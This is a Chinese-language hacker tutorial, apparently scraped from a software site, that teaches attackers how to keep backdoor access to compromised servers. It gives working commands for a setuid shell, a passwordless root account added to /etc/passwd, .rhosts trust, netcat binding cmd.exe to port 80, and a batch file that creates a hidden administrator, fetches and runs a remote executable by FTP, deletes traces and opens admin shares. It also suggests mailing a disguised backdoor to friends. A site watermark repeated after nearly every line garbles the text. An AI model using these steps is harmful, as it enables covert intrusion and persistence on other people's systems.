对于我们这样的菜手，好不容易搞了台服务器很不容易，如果被发现了就惨了。其实，开后门的方法有很多种，下面我来说说，我以前学习过的几种方法。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
1. Setuid XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
#cp /bin/sh /tmp/.rootXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
#chmod u s /tmp/.rootXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
加上 suid 位到shell 上，虽然很简单，但容易被发现。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
2. Echo "hack::0:0::/:/bin/csh" >> /etc/passwd XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
即给系统增加一个 ID 为 0（root)的帐号，无口令，但管理员用find命令就可以发现。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
3.Echo " hack">>/.rhosts XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
如果这个系统开了512、513的port，就可以。把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
4.修改 Sendmail.cf文件 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
增加一个"wiz" 命令，然后telnet www.xxx.com 25后，wiz，这就可以了。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
5. Rootkit backdoor XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
这些东西现在是很火热的东西，但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译，有的是编译好的。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
6.Remote shell XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
Sunx的那个backdoor就很不错，不会产生日记文件，防止who等等。需要编译，但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
或者可以bindshell，可以替换inetd.conf中不常用的服务，注意文件的修改时间。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
7. Http后门 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
其实，一般的防火墙对Web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向。简单的说就是web开的http服务有2个，一个是http本身，一个是remote shell bindshell。防火墙过滤其他一切port，禁止反向连接，简单的就是可以用nc。（netcat这个）把cmd.exe绑定到80端口上去。telnet www.xxx.com 80 然后就得到一个shell。或者可以利用asp,php.cgi等代码写的后门，也可以作到相同的效果。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
8.Bat后门（原创） XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
如果是xnix服务器，没办法。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
Ms服务器： XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
backdoor.batXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
net user hacker windychild /addXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
net localgroup administrators hacker /add ...create super admin userXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
echo open www.xxx.com>c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
echo xxx>>c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
echo xxxxxx>>c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
echo get srv.exe>>c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
echo bye>>c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
ftp -s:c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
copy srv.exe c:\winnt\XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
c:\winnt\srv.exeXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
del c:\ftp.txtXpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
del c:\srv.exe ......可以自己设置木马或后门等XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
....或你可以写上开启3389服务，telnet的语句XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
其他，开放共享服务！XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
net share ipc=ipc$XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
net share hdc=c$XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
......XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
如果狠点的话，干脆再给它上个rootkit for win。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
9.可以利用邮件编码漏洞 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
自己设置一个base64的编码文件发给你的朋友，然后把后门.exe转换成邮件编码。 XpG霏凡软件站> 资讯中心
XpG霏凡软件站> 资讯中心
其实，上面的方法都是很常见的方法。还有很多方法，一时没办法整理出来，但对于新手来说足够了！